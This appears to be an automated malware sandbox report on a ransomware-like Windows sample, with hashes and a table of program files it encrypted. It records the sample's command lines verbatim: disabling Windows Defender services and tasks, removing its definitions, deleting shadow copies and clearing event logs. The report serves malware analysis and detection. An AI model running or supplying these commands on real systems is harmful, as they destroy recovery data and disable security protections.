reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl application
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
Files
memory/460-55-0x0000000000000000-mapping.dmp
memory/1200-56-0x0000000000000000-mapping.dmp
memory/1412-57-0x0000000000000000-mapping.dmp
memory/1392-58-0x0000000000000000-mapping.dmp
memory/1400-59-0x0000000000000000-mapping.dmp
memory/1040-60-0x0000000000000000-mapping.dmp
memory/688-61-0x0000000000000000-mapping.dmp
memory/1072-62-0x0000000000000000-mapping.dmp
memory/720-63-0x0000000000000000-mapping.dmp
memory/1456-64-0x0000000000000000-mapping.dmp
memory/1136-65-0x0000000000000000-mapping.dmp
memory/1260-66-0x0000000000000000-mapping.dmp
memory/1820-67-0x0000000000000000-mapping.dmp
memory/1660-68-0x0000000000000000-mapping.dmp
memory/608-69-0x0000000000000000-mapping.dmp
memory/1548-70-0x0000000000000000-mapping.dmp
memory/1164-71-0x0000000000000000-mapping.dmp
memory/1844-72-0x0000000000000000-mapping.dmp
memory/1708-73-0x0000000000000000-mapping.dmp
memory/968-74-0x0000000000000000-mapping.dmp
memory/1064-75-0x0000000000000000-mapping.dmp
memory/1988-76-0x0000000000000000-mapping.dmp
memory/888-77-0x0000000000000000-mapping.dmp
memory/2036-78-0x0000000000000000-mapping.dmp
memory/616-79-0x0000000000000000-mapping.dmp
memory/1072-80-0x0000000000000000-mapping.dmp
memory/1144-81-0x0000000000000000-mapping.dmp
memory/656-82-0x0000000000000000-mapping.dmp
memory/1248-83-0x0000000000000000-mapping.dmp
memory/952-84-0x0000000000000000-mapping.dmp
memory/836-85-0x0000000000000000-mapping.dmp
memory/1716-86-0x0000000000000000-mapping.dmp
memory/288-87-0x0000000000000000-mapping.dmp
memory/792-88-0x0000000000000000-mapping.dmp
memory/1924-89-0x0000000000000000-mapping.dmp
memory/1712-90-0x0000000000000000-mapping.dmp
memory/1680-91-0x0000000000000000-mapping.dmp
memory/880-92-0x0000000000000000-mapping.dmp
memory/1156-93-0x0000000000000000-mapping.dmp
memory/1260-94-0x0000000000000000-mapping.dmp
memory/1348-95-0x0000000000000000-mapping.dmp
memory/1508-96-0x0000000000000000-mapping.dmp
memory/572-97-0x0000000000000000-mapping.dmp
memory/1060-98-0x0000000000000000-mapping.dmp
memory/2024-99-0x0000000000000000-mapping.dmp
memory/812-100-0x0000000000000000-mapping.dmp
memory/1808-101-0x0000000000000000-mapping.dmp
memory/992-102-0x0000000000000000-mapping.dmp
memory/2032-103-0x0000000000000000-mapping.dmp
memory/1736-104-0x0000000000000000-mapping.dmp
memory/1604-105-0x0000000000000000-mapping.dmp
memory/432-106-0x0000000000000000-mapping.dmp
memory/1768-107-0x0000000000000000-mapping.dmp
memory/2028-108-0x0000000000000000-mapping.dmp
memory/1332-109-0x0000000000000000-mapping.dmp
memory/996-110-0x0000000000000000-mapping.dmp
memory/1720-111-0x0000000000000000-mapping.dmp
memory/1528-112-0x0000000000000000-mapping.dmp
memory/1800-113-0x0000000000000000-mapping.dmp
memory/1084-114-0x0000000000000000-mapping.dmp
memory/1920-115-0x0000000000000000-mapping.dmp
memory/2064-116-0x0000000000000000-mapping.dmp
memory/2112-117-0x0000000000000000-mapping.dmp
memory/2196-118-0x0000000000000000-mapping.dmp
memory/2252-119-0x0000000076371000-0x0000000076373000-memory.dmp
memory/2252-120-0x0000000002640000-0x000000000328A000-memory.dmp
memory/2252-121-0x0000000002640000-0x000000000328A000-memory.dmp
memory/2252-122-0x0000000002640000-0x000000000328A000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| Algorithm | Digest |
| --- | --- |
| MD5 | 8ca131ef5aa05a74a43e8883d0c9671a |
| SHA1 | 8335d07a953b60386e03c90011cd95b24cf5d40a |
| SHA256 | d34432df10d2131663378f26d14eb8b1e315bcc49beac4cc7fa4d33cd64433bb |
| SHA512 | 76863c19096f5dedffc7cb691b184360ebd485841952f244ab0becb3b3b2dfaf8e9e04379629d6389e8789a4486520918fe8627c78345c560e14bea9bfa0bfb7 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-13 10:58
Reported
2022-01-13 11:04
Platform
win10-en-20211208
Max time kernel
57s
Max time network
153s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_u6TustaWNW80.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\WINWORD.VisualElementsManifest.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_dRX2kSBd8-I0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]_jKkhBXu26cc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Document Themes 16\Gallery.thmx.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_aubd7EaVH7g0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-140.png.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_PDMFPp_N5sg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial5-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_2Uy4j37glBE0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\linesdistinctive.dotx.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_e-fdEeB6NZQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_SubTrial-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_KLNKfZtaxgc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_O9UWejGBZsg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_p_D2pXOLaPg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_CDZHotFKzhY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\de-DE\tabskb.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fr-FR\InkObj.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\ipsita.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_TT3l7SEPVbQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.ssl_1.1.0.v20140827-1444.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_Vq9hbZ6isos0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp3-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_t_q-H0Fwyuk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.servlet_3.0.0.v201112011016.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_f74xiJwk6J40.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial1-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_sC6txoINkxM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_OEM_Perp-ul-phn.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_sG2wwPjKhcs0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_Retail-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_vSOQw2a6NtU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-options.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_AlqxZ1hwEtk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-compat_zh_CN.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_e1wb2jxfFrM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre1.8.0_66\lib\security\blacklist.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_8_KuKZUQxuk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Retail-ul-phn.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_opG2TB2KxRY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_2QInFJrgL500.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019MSDNR_Retail-pl.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_LcCfXeWreww0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MEDIA\LASER.WAV.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_KfR7gcjBHnI0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL108.XML.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_LhjMpSvU4Mc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\notice.txt.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_xPbG3pzwwC40.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\es-MX\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_OEM_Perp-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_zVSvPvogpvQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Internet Explorer\de-DE\iexplore.exe.mui.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_R9OV6-n5LH00.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_zh_4.4.0.v20140623020002.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_fYaD4mX2Jt80.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_zh_CN.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_gzVcIpieRYk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_MAK-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_ooyu-bPKq7o0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\VisioProMSDNR_Retail-pl.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_schHjeN7pfw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\msipc.dll.mui.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_9EwQFLOz8Bc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\MEDIA\CAMERA.WAV.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_Ato2AUXaqpk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\fr.txt.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_aRy6dd9lJmY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\ja-jp.xml | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_ja_4.4.0.v20140623020002.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_Eu6Tbbj7xFg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ppd.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_jKvcEfP5Gj80.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Grace-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_XbwawN3m78I0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_Iw_NvNnGh-Y0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_Trial-ppd.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_GCCHLIqOR800.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\ClientSub_eula.txt.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_HHe4TjruLfs0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\APASixthEditionOfficeOnline.xsl.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_eJXb6MKG-Ak0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_u-Lb0TLVjJU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\WacLangPackEula.txt.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_3ZTgQ4pCBtk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\leftnav.gif.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_b7BKT4GfSTk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-dialogs_ja.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_5T5Os-4u0Y40.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PROOF\MSGR8EN.LEX.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_aiL5EAiVNHQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_Vy4WlpRw8mU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\Fonts\private\ANTQUAI.TTF.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_tR_G96RAVcU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
